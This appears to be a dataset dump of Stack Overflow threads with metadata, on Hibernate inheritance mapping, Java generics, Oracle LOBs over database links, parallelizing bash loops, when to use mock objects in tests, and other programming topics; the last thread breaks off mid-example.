text
stringlengths 8
267k
| meta
dict |
---|---|
Q: Why @OneToMany does not work with inheritance in Hibernate @Entity
@Inheritance(strategy = InheritanceType.SINGLE_TABLE)
public class Problem {
@ManyToOne
private Person person;
}
@Entity
@DiscriminatorValue("UP")
public class UglyProblem extends Problem {}
@Entity
public class Person {
@OneToMany(mappedBy="person")
private List< UglyProblem > problems;
}
I think it is pretty clear what I am trying to do. I expect @ManyToOne person to be inherited by UglyProblem class. But there will be an exception saying something like: "There is no such property found in UglyProblem class (mappedBy="person")".
All I found is this. I was not able to find the post by Emmanuel Bernard explaining reasons behind this.
Unfortunately, according to the Hibernate documentation "Properties from superclasses not mapped as @MappedSuperclass are ignored."
Well I think this means that if I have these two classes:
public class A {
private int foo;
}
@Entity
public class B extens A {
}
then field foo will not be mapped for class B. Which makes sense. But if I have something like this:
@Entity
public class Problem {
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
private String name;
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
}
@Entity
public class UglyProblem extends Problem {
private int levelOfUgliness;
public int getLevelOfUgliness() {
return levelOfUgliness;
}
public void setLevelOfUgliness(int levelOfUgliness) {
this.levelOfUgliness = levelOfUgliness;
}
}
I expect the class UglyProblem to have fileds id and name and both classes to be mapped using same table. (In fact, this is exactly what happens, I have just checked again). I have got this table:
CREATE TABLE "problem" (
"DTYPE" varchar(31) NOT NULL,
"id" bigint(20) NOT NULL auto_increment,
"name" varchar(255) default NULL,
"levelOfUgliness" int(11) default NULL,
PRIMARY KEY ("id")
) AUTO_INCREMENT=2;
Going back to my question:
I expect @ManyToOne person to be inherited by UglyProblem class.
I expect that because all other mapped fields are inherited and I do not see any reason to make this exception for ManyToOne relationships.
Yeah, I saw that. In fact, I used Read-Only solution for my case. But my question was "Why..." :). I know that there is an explanation given by a member of hibernate team. I was not able to find it and that is why I asked.
I want to find out the motivation of this design decision.
(if you interested how I have faced this problem: I inherited a project built using hibernate 3. It was Jboss 4.0.something + hibernate was already there (you'd download it all together). I was moving this project to Jboss 4.2.2 and I found out that there are inherited mappings of "@OneToMany mappedBy" and it worked fine on old setup...)
A: I think it's a wise decision made by the Hibernate team. They could be less arrogante and make it clear why it was implemented this way, but that's just how Emmanuel, Chris and Gavin works. :)
Let's try to understand the problem. I think your concepts are "lying". First you say that many Problems are associated to People. But, then you say that one Person have many UglyProblems (and does not relate to other Problems). Something is wrong with that design.
Imagine how it's going to be mapped to the database. You have a single table inheritance, so:
_____________
|__PROBLEMS__| |__PEOPLE__|
|id <PK> | | |
|person <FK> | -------->| |
|problemType | |_________ |
--------------
How is hibernate going to enforce the database to make Problem only relate to People if its problemType is equal UP? That's a very difficult problem to solve. So, if you want this kind of relation, every subclass must be in it's own table. That's what @MappedSuperclass does.
PS.: Sorry for the ugly drawing :D
A: Unfortunately, according to the Hibernate documentation "Properties from superclasses not mapped as @MappedSuperclass are ignored." I ran up against this too. My solution was to represent the desired inheritance through interfaces rather than the entity beans themselves.
In your case, you could define the following:
public interface Problem {
public Person getPerson();
}
public interface UglyProblem extends Problem {
}
Then implement these interfaces using an abstract superclass and two entity subclasses:
@MappedSuperclass
public abstract class AbstractProblemImpl implements Problem {
@ManyToOne
private Person person;
public Person getPerson() {
return person;
}
}
@Entity
public class ProblemImpl extends AbstractProblemImpl implements Problem {
}
@Entity
public class UglyProblemImpl extends AbstractProblemImpl implements UglyProblem {
}
As an added benefit, if you code using the interfaces rather than the actual entity beans that implement those interfaces, it makes it easier to change the underlying mappings later on (less risk of breaking compatibility).
A: In my case I wanted to use the SINGLE_TABLE inheritance type, so using @MappedSuperclass wasn't an option.
What works, although not very clean, is to add the Hibernate proprietary @Where clause to the @OneToMany association to force the type in queries:
@OneToMany(mappedBy="person")
@Where(clause="DTYPE='UP'")
private List< UglyProblem > problems;
A: I think you need to annotate your Problem super-class with @MappedSuperclass instead of @Entity.
A: I figured out how to do the OneToMany mappedBy problem.
In the derived class UglyProblem from the original post. The callback method needs to be in the derived class not the parent class.
@Entity
@Inheritance(strategy = InheritanceType.SINGLE_TABLE)
@ForceDiscriminator
public class Problem {
}
@Entity
@DiscriminatorValue("UP")
public class UglyProblem extends Problem {
@ManyToOne
private Person person;
}
@Entity
public class Person {
@OneToMany(mappedBy="person")
private List< UglyProblem > problems;
}
Found the secret sauce for using Hibernate at least. http://docs.jboss.org/hibernate/stable/annotations/api/org/hibernate/annotations/ForceDiscriminator.html The @ForceDiscriminator makes the @OneToMany honor the discriminator
Requires Hibernate Annotations.
A: In my opinion @JoinColumn should at least provide an option to apply the @DiscriminatorColumn = @DiscriminatorValue to the SQL "where" clause, although I would prefer this behaviour to be a default one.
I am very surprised that in the year 2020 this is still an issue.
Since this object design pattern is not so rare, I think it is a disgrace for JPA not yet covering this simple feature in the specs, thus still forcing us to search for ugly workarounds.
Why must this be so difficult? It is just an additional where clause and yes, I do have a db index prepared for @JoinColumn, @DiscriminatorColumn combo.
.i.. JPA
Introduce your own custom annotations and write code that generates native queries. It will be a good exercise.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38057",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: Generics in Java Is there any shorthand way of defining and using generic definitions without having to keep repeating a particular generic description such that if there is a change I don't have to change all definitions/usages though out the codebase for example is something like this possible:
Typedef myGenDef = < Object1, Object2 >;
HashMap< myGenDef > hm = new HashMap< myGenDef >();
for (Entry< myGenDef > ent : hm..entrySet())
{
.
.
.
}
A: In a generic method, you can use a limited form of type inferrence to avoid some repetitions.
Example: if you have the function
<K, V> Map<K, V> getSomething() {
//...
}
you can use:
final Map<String, Object> something = getsomething();
instead of:
final Map<String, Object> something = this.<String, Object>getsomething();
A: Use Factory Pattern for creation of Generics:
Method Sample:
public Map<String, Integer> createGenMap(){
return new HashMap<String,Integer>();
}
A: The pseudo-typedef antipattern mentioned by Shog9 would work - though it's not recommended to use an ANTIPATTERN - but it does not address your intentions. The goal of pseudo-typedef is to reduce clutter in declaration and improve readability.
What you want is to be able to replace a group of generics declarations by one single trade. I think you have to stop and think: "in witch ways is it valuable?". I mean, I can't think of a scenario where you would need this. Imagine class A:
class A {
private Map<String, Integer> values = new HashMap<String, Integer>();
}
Imagine now that I want to change the 'values' field to a Map. Why would exist many other fields scattered through the code that needs the same change? As for the operations that uses 'values' a simple refactoring would be enough.
A: There's the pseudo-typedef antipattern...
class StringList extends ArrayList<String> { }
Good stuff, drink up! ;-)
As the article notes, this technique has some serious issues, primarily that this "typedef" is actually a separate class and thus cannot be used interchangeably with either the type it extends or other similarly defined types.
A: No. Though, groovy, a JVM language, is dynamically typed and would let you write:
def map = new HashMap<complicated generic expression>();
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38068",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: Best way to handle LOBs in Oracle distributed databases If you create an Oracle dblink you cannot directly access LOB columns in the target tables.
For instance, you create a dblink with:
create database link TEST_LINK
connect to TARGETUSER IDENTIFIED BY password using 'DATABASESID';
After this you can do stuff like:
select column_a, column_b
from data_user.sample_table@TEST_LINK
Except if the column is a LOB, then you get the error:
ORA-22992: cannot use LOB locators selected from remote tables
This is a documented restriction.
The same page suggests you fetch the values into a local table, but that is... kind of messy:
CREATE TABLE tmp_hello
AS SELECT column_a
from data_user.sample_table@TEST_LINK
Any other ideas?
A: Yeah, it is messy, I can't think of a way to avoid it though.
You could hide some of the messiness from the client by putting the temporary table creation in a stored procedure (and using "execute immediate" to create they table)
One thing you will need to watch out for is left over temporary tables (should something fail half way through a session, before you have had time to clean it up) - you could schedule an oracle job to periodically run and remove any left over tables.
A: For query data, the solution of user2015502 is the smartest. If you want to insert or update LOB's AT the remote database (insert into xxx@yyy ...) you can easily use dynamic SQL for that. See my solution here:
A: The best solution by using a query as below, where column_b is a BLOB:
SELECT (select column_b from sample_table@TEST_LINK) AS column_b FROM DUAL
A: You could use materalized views to handle all the "cache" management. It´s not perfect but works in most cases :)
A: Do you have a specific scenario in mind?
For example, if the LOB holds files, and you are on a company intranet, perhaps you can write a stored procedure to extract the files to a known directory on the network and access them from there.
A: In this specific case can the only way the two systems can communicate is using the dblink.
Also, the table solution is not that terrible, it's just messy to have to "cache" the data on my side of the dblink.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38074",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: How to implement mouse dragging in Visual Basic? I need to create a quick-n-dirty knob control in Visual Basic 2005 Express, the value of which is incremented/decremented by "grabbing" it with the mouse and moving the cursor up/down. Because the knob itself doesn't move, I need to keep tracking the mouse movement outside of the rectangle of the control.
I use a Label with an ImageList to implement this (I have a list of 127 bitmaps representing the knob in various positions).
Which events should I react to?
A: You need the control to handle three events: Mouse Down, Mouse Move and Mouse Up. On the Mouse Down event, you will need to capture the mouse. This means the mouse messages are sent to the control that has the capture. In the mouse move event, if the input is captured then update the displayed image depending on the amount the mouse moved. In the mouse up event, release the capture if the input is captured.
The boolean jjnguy suggests is unnecessary as the Capture property of a Control is readable so it's possible to determine if the capture has been set.
A: Your problem will be to determine which bitmap you have to display based upon the coordinates the mouse reports in the mouse_move event. You'll need to perform some magic to transform the coordinates and come up with a value that you can use to pick the right image.
It doesn't sound too complicated, just a little bit of trial and error in the math. Skizz has already show you how to capture the events.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38081",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How to prevent Write Ahead Logging on just one table in PostgreSQL? I am considering log-shipping of Write Ahead Logs (WAL) in PostgreSQL to create a warm-standby database. However I have one table in the database that receives a huge amount of INSERT/DELETEs each day, but which I don't care about protecting the data in it. To reduce the amount of WALs produced I was wondering, is there a way to prevent any activity on one table from being recorded in the WALs?
A: Unfortunately, I don't believe there is. The WAL logging operates on the page level, which is much lower than the table level and doesn't even know which page holds data from which table. In fact, the WAL files don't even know which pages belong to which database.
You might consider moving your high activity table to a completely different instance of PostgreSQL. This seems drastic, but I can't think of another way off the top of my head to avoid having that activity show up in your WAL files.
A: Ran across this old question, which now has a better answer. Postgres 9.1 introduced "Unlogged Tables", which are tables that don't log their DML changes to WAL. See the docs for more info, but at least now there is a solution for this problem.
See Waiting for 9.1 - UNLOGGED tables by depesz, and the 9.1 docs.
A: To offer one option to my own question. There are temp tables - "temporary tables are automatically dropped at the end of a session, or optionally at the end of the current transaction (see ON COMMIT below)" - which I think don't generate WALs. Even so, this might not be ideal as the table creation & design will be have to be in the code.
A: I'd consider memcached for use-cases like this. You can even spread the load over a bunch of cheap machines too.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38090",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Cross Page Postback doesn't work for client-side enabled button I am using a cross page postback for Page A to pass data to Page B.
The button that causes the postback has its postbackurl set but is disabled until the user selects a value from a DDL at which point the button is enable using javascript. However this prevents the cross page postback from occurring, Page A just postbacks to itself.
If the button is never disabled it works fine. Anyone know how to solve this?
A: It looks like when the button is disabled .Net doesn't bother adding the necessary bits to handle the cross page postback on the client, so they will be missing when the button is enable client-side.
I guess one solution would be to have the button enabled to start with (so that .Net adds the cross page postback controls) and then disable it using javascript as soon as the control loads on the client. But this sounds a bit clunky.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38107",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Inbox Management (in Outlook) I've gone back and forth between having an organized inbox and having an inbox with absolutely everything I've received in it.
Would you recommend leaving everything in an inbox, or organize it? If you organize it, is there any method to your madness or possibly an Outlook (2003) plug-in to aid in this task?
For what it's worth, I feel way more productive with everything in my inbox, grouped by date. I feel like a spend way more time doing inbox management any other way.
A: I would recommend following the inbox zero approach advocated by 43 folders. Joel Spolsky apparently uses it and a lot of people feel it's a great way of decluttering and organising your email life :-).
A: If you don't want to actually clear out your inbox, you could use a good search utility like Google Desktop, Yahoo Desktop Search (is that what it's called) or my current favorite, Xobni.
With these tools you don't have to worry about where you put the mails you saved. Just save them all and let the tools find it.
A: I switched to gMail and have never been happier.
You could also try using a tags plugin like http://www.taglocity.com/index.html
A: I'm going with the Microsoft way;
*
*Delete it
*Defer it
*Delegate it
*Do it
It works for me great.
You can read about it at http://www.microsoft.com/atwork/manageinfo/email.mspx.
A: We've invested in a few licenses of Simply File for our employees. Works a treat at managing your inbox - it learns (don't ask me how, but it is very good) how to file things for you and does it automatically.
I was sceptical about it at first, until I tried it then I was a convert.
A: Keep to the ideal of inbox zero in the actual inbox, then employ a decent search engine (Google Desktop or Xobni for example).
I have a handful of project- or filter-specific folders (e.g. for system generated status messages that go to a mailing list), but generally all archived email is dumped in one folder.
In Outlook 2007 categories (which can approach the usefulness of tags) do add a potentially useful dimension.
A: I use message flags for my "action folders" and shunt everything into one big Archive folder after I process it (use the Ctrl+Shift+V shortcut to do this). As an example, I might flag a received message with a red flag (reply), a blue flag (pending, meaning I have to do something about it first), or maybe a green flag (reference). I then have search folders for each of my flag colors.
This flagging/search folder method is explained fairly well in this blog post.
I've also implemented a Gmail-like conversation view search folder which has been pretty handy.
A: The best place to start with getting control of your email is definitely Merlin Mann's excellent Inbox Zero series. In particular his Google Tech Talk video is a great talk.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38117",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: Strategies for keeping a Lucene Index up to date with domain model changes Was looking to get peoples thoughts on keeping a Lucene index up to date as changes are made to the domain model objects of an application.
The application in question is a Java/J2EE based web app that uses Hibernate. The way I currently have things working is that the Hibernate mapped model objects all implement a common "Indexable" interface that can return a set of key/value pairs that are recorded in Lucene. Whenever a CRUD operation is performed involving such an object I send it via JMS queue into a message driven bean that records in Lucene the primary key of the object and the key/value pairs returned from the index( ) method of the Indexable object that was provided.
My main worries about this scheme is if the MDB gets behind and can't keep up with the indexing operations that are coming in or if some sort of error/exception stops an object from being index. The result is an out-of-date index for either a sort, or long, period of time.
Basically I was just wondering what kind of strategies others had come up with for this sort of thing. Not necessarily looking for one correct answer but am imagining a list of "whiteboard" sort of ideas to get my brain thinking about alternatives.
A: Change the message: just provide the primary key and the current date, not the key/value pairs. Your mdb fetches the entity by primary key and calls index(). After indexing you set a value "updated" in your index to the message date. You update your index only if the message date is after the "updated" field of the index. This way you can't get behind because you always fetch the current key/value pairs first.
As an alternative: have a look at http://www.compass-project.org.
A: The accepted answer is 8 years old now and very out of date.
The Compass Project is not maintained anymore since a long time, as its main developer moved on to create the excellent Elasticsearch.
The modern answer to this is to use Hibernate Search, which incidentally can map to either a Lucene index directly or through Elasticsearch.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38125",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: after opening target in new window - new window cannot be closed I've got a page with an control - the link is to a gif file. Right clicking on the link (in IE7) and selecting "open target in new window" correctly displays the image. However I can't then close the new IE window.
MORE INFO: Works OK in Firefox 3
What might I be doing wrong ?
TIA
Tom
A: There isn't really something you can do wrong to prevent a window from being closed on the client.
My guess is this is a problem with the system installation.
Test this again using another browser on the same computer, and then on another computer.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38151",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: What is a good maintainability index using Visual Studio 2008 code analysis? My company recently purchased TFS and I have started looking into the code analysis tools to help drive up code quality and noticed a good looking metric "maintainability index". Is anyone using this metric for code reviews/checkins/etc? If so, what is an acceptable index for developers to work toward?
A: The maintainability index is not as much a fixed value you look at, it's more of an indication that code is hard to understand, test and/or debug. I usually try to keep high-level code (basically anything except for the real plumbing code) above 80, where 90+ would be good. It adds a competitive element to programming as maintainable as possible to me.
The code analysis tool really shines in the area of dependencies and the number of branches within a method though. More branches mean harder testing, which makes it more error-prone. Dependencies, same thing.
In other people's code, I use the maintainability index to spot possible bad parts in the code, so I know where to review it. Also, methods/classes with a high number of lines are an indication of poor code to me (unless it can't be avoided, again, the plumbing works).
In the end, I think it mainly depends on how often your code will change. Code that's expected to change a lot has to score higher in maintainability than your typical 'write once' code.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38158",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: Parallelize Bash script with maximum number of processes Lets say I have a loop in Bash:
for foo in `some-command`
do
do-something $foo
done
do-something is cpu bound and I have a nice shiny 4 core processor. I'd like to be able to run up to 4 do-something's at once.
The naive approach seems to be:
for foo in `some-command`
do
do-something $foo &
done
This will run all do-somethings at once, but there are a couple downsides, mainly that do-something may also have some significant I/O which performing all at once might slow down a bit. The other problem is that this code block returns immediately, so no way to do other work when all the do-somethings are finished.
How would you write this loop so there are always X do-somethings running at once?
A: If you're familiar with the make command, most of the time you can express the list of commands you want to run as a a makefile. For example, if you need to run $SOME_COMMAND on files *.input each of which produces *.output, you can use the makefile
INPUT = a.input b.input
OUTPUT = $(INPUT:.input=.output)
%.output : %.input
$(SOME_COMMAND) $< $@
all: $(OUTPUT)
and then just run
make -j<NUMBER>
to run at most NUMBER commands in parallel.
A: Depending on what you want to do xargs also can help (here: converting documents with pdf2ps):
cpus=$( ls -d /sys/devices/system/cpu/cpu[[:digit:]]* | wc -w )
find . -name \*.pdf | xargs --max-args=1 --max-procs=$cpus pdf2ps
From the docs:
--max-procs=max-procs
-P max-procs
Run up to max-procs processes at a time; the default is 1.
If max-procs is 0, xargs will run as many processes as possible at a
time. Use the -n option with -P; otherwise chances are that only one
exec will be done.
A: While doing this right in bash is probably impossible, you can do a semi-right fairly easily. bstark gave a fair approximation of right but his has the following flaws:
*
*Word splitting: You can't pass any jobs to it that use any of the following characters in their arguments: spaces, tabs, newlines, stars, question marks. If you do, things will break, possibly unexpectedly.
*It relies on the rest of your script to not background anything. If you do, or later you add something to the script that gets sent in the background because you forgot you weren't allowed to use backgrounded jobs because of his snippet, things will break.
Another approximation which doesn't have these flaws is the following:
scheduleAll() {
local job i=0 max=4 pids=()
for job; do
(( ++i % max == 0 )) && {
wait "${pids[@]}"
pids=()
}
bash -c "$job" & pids+=("$!")
done
wait "${pids[@]}"
}
Note that this one is easily adaptable to also check the exit code of each job as it ends so you can warn the user if a job fails or set an exit code for scheduleAll according to the amount of jobs that failed, or something.
The problem with this code is just that:
*
*It schedules four (in this case) jobs at a time and then waits for all four to end. Some might be done sooner than others which will cause the next batch of four jobs to wait until the longest of the previous batch is done.
A solution that takes care of this last issue would have to use kill -0 to poll whether any of the processes have disappeared instead of the wait and schedule the next job. However, that introduces a small new problem: you have a race condition between a job ending, and the kill -0 checking whether it's ended. If the job ended and another process on your system starts up at the same time, taking a random PID which happens to be that of the job that just finished, the kill -0 won't notice your job having finished and things will break again.
A perfect solution isn't possible in bash.
A: Maybe try a parallelizing utility instead rewriting the loop? I'm a big fan of xjobs. I use xjobs all the time to mass copy files across our network, usually when setting up a new database server.
http://www.maier-komor.de/xjobs.html
A: With GNU Parallel http://www.gnu.org/software/parallel/ you can write:
some-command | parallel do-something
GNU Parallel also supports running jobs on remote computers. This will run one per CPU core on the remote computers - even if they have different number of cores:
some-command | parallel -S server1,server2 do-something
A more advanced example: Here we list of files that we want my_script to run on. Files have extension (maybe .jpeg). We want the output of my_script to be put next to the files in basename.out (e.g. foo.jpeg -> foo.out). We want to run my_script once for each core the computer has and we want to run it on the local computer, too. For the remote computers we want the file to be processed transferred to the given computer. When my_script finishes, we want foo.out transferred back and we then want foo.jpeg and foo.out removed from the remote computer:
cat list_of_files | \
parallel --trc {.}.out -S server1,server2,: \
"my_script {} > {.}.out"
GNU Parallel makes sure the output from each job does not mix, so you can use the output as input for another program:
some-command | parallel do-something | postprocess
See the videos for more examples: https://www.youtube.com/playlist?list=PL284C9FF2488BC6D1
A: function for bash:
parallel ()
{
awk "BEGIN{print \"all: ALL_TARGETS\\n\"}{print \"TARGET_\"NR\":\\n\\t@-\"\$0\"\\n\"}END{printf \"ALL_TARGETS:\";for(i=1;i<=NR;i++){printf \" TARGET_%d\",i};print\"\\n\"}" | make $@ -f - all
}
using:
cat my_commands | parallel -j 4
A: Really late to the party here, but here's another solution.
A lot of solutions don't handle spaces/special characters in the commands, don't keep N jobs running at all times, eat cpu in busy loops, or rely on external dependencies (e.g. GNU parallel).
With inspiration for dead/zombie process handling, here's a pure bash solution:
function run_parallel_jobs {
local concurrent_max=$1
local callback=$2
local cmds=("${@:3}")
local jobs=( )
while [[ "${#cmds[@]}" -gt 0 ]] || [[ "${#jobs[@]}" -gt 0 ]]; do
while [[ "${#jobs[@]}" -lt $concurrent_max ]] && [[ "${#cmds[@]}" -gt 0 ]]; do
local cmd="${cmds[0]}"
cmds=("${cmds[@]:1}")
bash -c "$cmd" &
jobs+=($!)
done
local job="${jobs[0]}"
jobs=("${jobs[@]:1}")
local state="$(ps -p $job -o state= 2>/dev/null)"
if [[ "$state" == "D" ]] || [[ "$state" == "Z" ]]; then
$callback $job
else
wait $job
$callback $job $?
fi
done
}
And sample usage:
function job_done {
if [[ $# -lt 2 ]]; then
echo "PID $1 died unexpectedly"
else
echo "PID $1 exited $2"
fi
}
cmds=( \
"echo 1; sleep 1; exit 1" \
"echo 2; sleep 2; exit 2" \
"echo 3; sleep 3; exit 3" \
"echo 4; sleep 4; exit 4" \
"echo 5; sleep 5; exit 5" \
)
# cpus="$(getconf _NPROCESSORS_ONLN)"
cpus=3
run_parallel_jobs $cpus "job_done" "${cmds[@]}"
The output:
1
2
3
PID 56712 exited 1
4
PID 56713 exited 2
5
PID 56714 exited 3
PID 56720 exited 4
PID 56724 exited 5
For per-process output handling $$ could be used to log to a file, for example:
function job_done {
cat "$1.log"
}
cmds=( \
"echo 1 \$\$ >\$\$.log" \
"echo 2 \$\$ >\$\$.log" \
)
run_parallel_jobs 2 "job_done" "${cmds[@]}"
Output:
1 56871
2 56872
A:
maxjobs=4
parallelize () {
while [ $# -gt 0 ] ; do
jobcnt=(`jobs -p`)
if [ ${#jobcnt[@]} -lt $maxjobs ] ; then
do-something $1 &
shift
else
sleep 1
fi
done
wait
}
parallelize arg1 arg2 "5 args to third job" arg4 ...
A: The project I work on uses the wait command to control parallel shell (ksh actually) processes. To address your concerns about IO, on a modern OS, it's possible parallel execution will actually increase efficiency. If all processes are reading the same blocks on disk, only the first process will have to hit the physical hardware. The other processes will often be able to retrieve the block from OS's disk cache in memory. Obviously, reading from memory is several orders of magnitude quicker than reading from disk. Also, the benefit requires no coding changes.
A: Here an alternative solution that can be inserted into .bashrc and used for everyday one liner:
function pwait() {
while [ $(jobs -p | wc -l) -ge $1 ]; do
sleep 1
done
}
To use it, all one has to do is put & after the jobs and a pwait call, the parameter gives the number of parallel processes:
for i in *; do
do_something $i &
pwait 10
done
It would be nicer to use wait instead of busy waiting on the output of jobs -p, but there doesn't seem to be an obvious solution to wait till any of the given jobs is finished instead of a all of them.
A: Instead of a plain bash, use a Makefile, then specify number of simultaneous jobs with make -jX where X is the number of jobs to run at once.
Or you can use wait ("man wait"): launch several child processes, call wait - it will exit when the child processes finish.
maxjobs = 10
foreach line in `cat file.txt` {
jobsrunning = 0
while jobsrunning < maxjobs {
do job &
jobsrunning += 1
}
wait
}
job ( ){
...
}
If you need to store the job's result, then assign their result to a variable. After wait you just check what the variable contains.
A: This might be good enough for most purposes, but is not optimal.
#!/bin/bash
n=0
maxjobs=10
for i in *.m4a ; do
# ( DO SOMETHING ) &
# limit jobs
if (( $(($((++n)) % $maxjobs)) == 0 )) ; then
wait # wait until all have finished (not optimal, but most times good enough)
echo $n wait
fi
done
A: Here is how I managed to solve this issue in a bash script:
#! /bin/bash
MAX_JOBS=32
FILE_LIST=($(cat ${1}))
echo Length ${#FILE_LIST[@]}
for ((INDEX=0; INDEX < ${#FILE_LIST[@]}; INDEX=$((${INDEX}+${MAX_JOBS})) ));
do
JOBS_RUNNING=0
while ((JOBS_RUNNING < MAX_JOBS))
do
I=$((${INDEX}+${JOBS_RUNNING}))
FILE=${FILE_LIST[${I}]}
if [ "$FILE" != "" ];then
echo $JOBS_RUNNING $FILE
./M22Checker ${FILE} &
else
echo $JOBS_RUNNING NULL &
fi
JOBS_RUNNING=$((JOBS_RUNNING+1))
done
wait
done
A: You can use a simple nested for loop (substitute appropriate integers for N and M below):
for i in {1..N}; do
(for j in {1..M}; do do_something; done & );
done
This will execute do_something N*M times in M rounds, each round executing N jobs in parallel. You can make N equal the number of CPUs you have.
A: My solution to always keep a given number of processes running, keep tracking of errors and handle ubnterruptible / zombie processes:
function log {
echo "$1"
}
# Take a list of commands to run, runs them sequentially with numberOfProcesses commands simultaneously runs
# Returns the number of non zero exit codes from commands
function ParallelExec {
local numberOfProcesses="${1}" # Number of simultaneous commands to run
local commandsArg="${2}" # Semi-colon separated list of commands
local pid
local runningPids=0
local counter=0
local commandsArray
local pidsArray
local newPidsArray
local retval
local retvalAll=0
local pidState
local commandsArrayPid
IFS=';' read -r -a commandsArray <<< "$commandsArg"
log "Runnning ${#commandsArray[@]} commands in $numberOfProcesses simultaneous processes."
while [ $counter -lt "${#commandsArray[@]}" ] || [ ${#pidsArray[@]} -gt 0 ]; do
while [ $counter -lt "${#commandsArray[@]}" ] && [ ${#pidsArray[@]} -lt $numberOfProcesses ]; do
log "Running command [${commandsArray[$counter]}]."
eval "${commandsArray[$counter]}" &
pid=$!
pidsArray+=($pid)
commandsArrayPid[$pid]="${commandsArray[$counter]}"
counter=$((counter+1))
done
newPidsArray=()
for pid in "${pidsArray[@]}"; do
# Handle uninterruptible sleep state or zombies by ommiting them from running process array (How to kill that is already dead ? :)
if kill -0 $pid > /dev/null 2>&1; then
pidState=$(ps -p$pid -o state= 2 > /dev/null)
if [ "$pidState" != "D" ] && [ "$pidState" != "Z" ]; then
newPidsArray+=($pid)
fi
else
# pid is dead, get it's exit code from wait command
wait $pid
retval=$?
if [ $retval -ne 0 ]; then
log "Command [${commandsArrayPid[$pid]}] failed with exit code [$retval]."
retvalAll=$((retvalAll+1))
fi
fi
done
pidsArray=("${newPidsArray[@]}")
# Add a trivial sleep time so bash won't eat all CPU
sleep .05
done
return $retvalAll
}
Usage:
cmds="du -csh /var;du -csh /tmp;sleep 3;du -csh /root;sleep 10; du -csh /home"
# Execute 2 processes at a time
ParallelExec 2 "$cmds"
# Execute 4 processes at a time
ParallelExec 4 "$cmds"
A: $DOMAINS = "list of some domain in commands"
for foo in some-command
do
eval `some-command for $DOMAINS` &
job[$i]=$!
i=$(( i + 1))
done
Ndomains=echo $DOMAINS |wc -w
for i in $(seq 1 1 $Ndomains)
do
echo "wait for ${job[$i]}"
wait "${job[$i]}"
done
in this concept will work for the parallelize. important thing is last line of eval is '&'
which will put the commands to backgrounds.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38160",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "98"
} |
Q: When should I mock? I have a basic understanding of mock and fake objects, but I'm not sure I have a feeling about when/where to use mocking - especially as it would apply to this scenario here.
A: Rule of thumb:
If the function you are testing needs a complicated object as a parameter, and it would be a pain to simply instantiate this object (if, for example it tries to establish a TCP connection), use a mock.
A: You should mock an object when you have a dependency in a unit of code you are trying to test that needs to be "just so".
For example, when you are trying to test some logic in your unit of code but you need to get something from another object and what is returned from this dependency might affect what you are trying to test - mock that object.
A great podcast on the topic can be found here
A: Mock objects are useful when you want to test interactions between a class under test and a particular interface.
For example, we want to test that method sendInvitations(MailServer mailServer) calls MailServer.createMessage() exactly once, and also calls MailServer.sendMessage(m) exactly once, and no other methods are called on the MailServer interface. This is when we can use mock objects.
With mock objects, instead of passing a real MailServerImpl, or a test TestMailServer, we can pass a mock implementation of the MailServer interface. Before we pass a mock MailServer, we "train" it, so that it knows what method calls to expect and what return values to return. At the end, the mock object asserts, that all expected methods were called as expected.
This sounds good in theory, but there are also some downsides.
Mock shortcomings
If you have a mock framework in place, you are tempted to use mock object every time you need to pass an interface to the class under the test. This way you end up testing interactions even when it is not necessary. Unfortunately, unwanted (accidental) testing of interactions is bad, because then you're testing that a particular requirement is implemented in a particular way, instead of that the implementation produced the required result.
Here's an example in pseudocode. Let's suppose we've created a MySorter class and we want to test it:
// the correct way of testing
testSort() {
testList = [1, 7, 3, 8, 2]
MySorter.sort(testList)
assert testList equals [1, 2, 3, 7, 8]
}
// incorrect, testing implementation
testSort() {
testList = [1, 7, 3, 8, 2]
MySorter.sort(testList)
assert that compare(1, 2) was called once
assert that compare(1, 3) was not called
assert that compare(2, 3) was called once
....
}
(In this example we assume that it's not a particular sorting algorithm, such as quick sort, that we want to test; in that case, the latter test would actually be valid.)
In such an extreme example it's obvious why the latter example is wrong. When we change the implementation of MySorter, the first test does a great job of making sure we still sort correctly, which is the whole point of tests - they allow us to change the code safely. On the other hand, the latter test always breaks and it is actively harmful; it hinders refactoring.
Mocks as stubs
Mock frameworks often allow also less strict usage, where we don't have to specify exactly how many times methods should be called and what parameters are expected; they allow creating mock objects that are used as stubs.
Let's suppose we have a method sendInvitations(PdfFormatter pdfFormatter, MailServer mailServer) that we want to test. The PdfFormatter object can be used to create the invitation. Here's the test:
testInvitations() {
// train as stub
pdfFormatter = create mock of PdfFormatter
let pdfFormatter.getCanvasWidth() returns 100
let pdfFormatter.getCanvasHeight() returns 300
let pdfFormatter.addText(x, y, text) returns true
let pdfFormatter.drawLine(line) does nothing
// train as mock
mailServer = create mock of MailServer
expect mailServer.sendMail() called exactly once
// do the test
sendInvitations(pdfFormatter, mailServer)
assert that all pdfFormatter expectations are met
